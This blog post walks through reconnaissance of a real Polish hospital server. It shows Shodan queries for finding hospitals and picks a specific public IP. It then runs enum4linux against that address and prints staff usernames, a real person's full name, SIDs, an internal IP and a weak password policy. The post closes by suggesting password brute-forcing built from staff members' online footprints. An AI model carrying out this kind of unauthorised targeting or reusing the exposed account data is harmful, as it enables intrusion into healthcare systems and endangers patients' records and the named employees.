Every now and then you can read about health care data breach. It’s no wonder that this happens … IT Security in hospitals is rather poor. This post will show how it happens from the very beginning.

OSint

First let’s chose a target from shodan.io. We are going to look for “szpital” which means hospital in Poland.

So we get 157 results. Now we will eliminate hosting companies like “ovh” or in this example “home.pl” and we will choose only Poland like this:

szpital country:”PL” & !org:”home.pl webhosting farm – static allocation”

Ok now there are only 41 results which are really interesting. Telnet services, NetBios! 🙂 Lets check this with NetBios.

szpital country:”PL” & !org:”home.pl webhosting farm – static allocation” port:”137″

So now we can select target. We will select 188.164.151.226 because the server name is CERBER = Cerberus. It must be quite a hard and dangerous server to hack :). Shodan.io shows us that server name is CERBER0 and that additional extra that internal IP is 172.16.0.2:

NetBIOS Response Servername: CERBER0 MAC: 00:00:00:00:00:00 Names: CERBER0 <0x0> CERBER0 <0x3> CERBER0 <0x20> __MSBROWSE__ <0x1> SZPITAL <0x0> SZPITAL <0x1d> SZPITAL <0x1e> Additional Interfaces: 172.16.0.2

What more can shodan.io tell us? That there is something very interesting on this server called BACKUP and that it is Debian Samba v 4.2.14. It’s getting more and more interesting:

SMB Status Authentication: disabled SMB Version: 1 Capabilities: raw-mode,unicode,large-files,nt-smb,rpc-remote-api,nt-status,level2-oplocks,lock-and-read,nt-find,dfs,infolevel-passthru,large-readx,large-writex,unix,extended-security Shares Name Type Comments ------------------------------------------------------------------------ print$ Disk Printer Drivers Backup Disk IPC$ IPC IPC Service (Samba 4.2.14-Debian)

SMB Enumeration

OK! so we got this far. Let’s do something simple and just connect to this share.

As you can see a valid user and password is required. What a bummer… 😉

Let’s use enum4linux as its quick and gives plenty of info.

root@ohampn:~# enum4linux -v 188.164.151.226

…

Domain Name: SZPITAL

Domain Sid: (NULL SID)

…

[+] Got OS info for 188.164.151.226 from srvinfo:

CERBER0 Wk Sv PrQ Unx NT SNT Samba 4.2.14-Debian

platform_id : 500

os version : 6.1

server type : 0x809a03

…

================================

| Users on 188.164.151.226 |

================================

ndex: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc:

index: 0x2 RID: 0x3e8 acb: 0x00000010 Account: mariusz Name: mariusz Desc:

index: 0x3 RID: 0x3ec acb: 0x00000010 Account: izap Name: Desc:

index: 0x4 RID: 0x3ed acb: 0x00000010 Account: kubac Name: Desc:

index: 0x5 RID: 0x3f2 acb: 0x00000010 Account: zelechowskip Name: Piotr Żelechowski Desc:

…

user:[nobody] rid:[0x1f5]

user:[mariusz] rid:[0x3e8]

user:[izap] rid:[0x3ec]

user:[kubac] rid:[0x3ed]

user:[zelechowskip] rid:[0x3f2]

…

Password Complexity: Disabled

Minimum Password Length: 5

…

[+] Enumerating users using SID S-1-22-1 and logon username ”, password ”

S-1-22-1-1000 Unix User\mariusz (Local User)

S-1-22-1-1001 Unix User\konsultant (Local User)

S-1-22-1-1002 Unix User\dariuszs (Local User)

S-1-22-1-1003 Unix User\jg (Local User)

S-1-22-1-1004 Unix User\gorskim

S-1-22-1-1005 Unix User\olszakg

S-1-22-1-1006 Unix User\marcin

S-1-22-1-1007 Unix User\grzegowski

S-1-22-1-1008 Unix User\zboinska

S-1-22-1-1009 Unix User\poli1

S-1-22-1-1021 Unix User\izap

S-1-22-1-1023 Unix User\kubac

S-1-22-1-1026 Unix User\radoszewskiw

S-1-22-1-1030 Unix User\stankiewiczk

S-1-22-1-1031 Unix User\piotrs

S-1-22-1-1032 Unix User\zelechowskip

S-1-22-1-1033 Unix User\pawlukj

S-1-22-1-1034 Unix User\witanskis

…

S-1-5-21-3495312121-1951532440-972160326-1000 CERBER0\mariusz

S-1-5-21-3495312121-1951532440-972160326-1004 CERBER0\izap

S-1-5-21-3495312121-1951532440-972160326-1005 CERBER0\kubac

S-1-5-21-3495312121-1951532440-972160326-1010 CERBER0\zelechowskip

Summery 😉

So lets verify what we know.

Domain: \CERBER0

Domain: \SZPITAL

Admin users: mariusz, izap, kubac, zelechowskip

Valid list of standard users

Internal IP address: 172.16.0.2

…What next?

Well next one can star bruteforce logins. To do it with better luck one should check if user names are connected to real people on the internet and create a password DB.

There is also an http service running apache 2.4.10 and an ssh service on custom port…

With apache one can find existing user folders… like ~mariusz ~backup…..

……..

54.194322 16.171491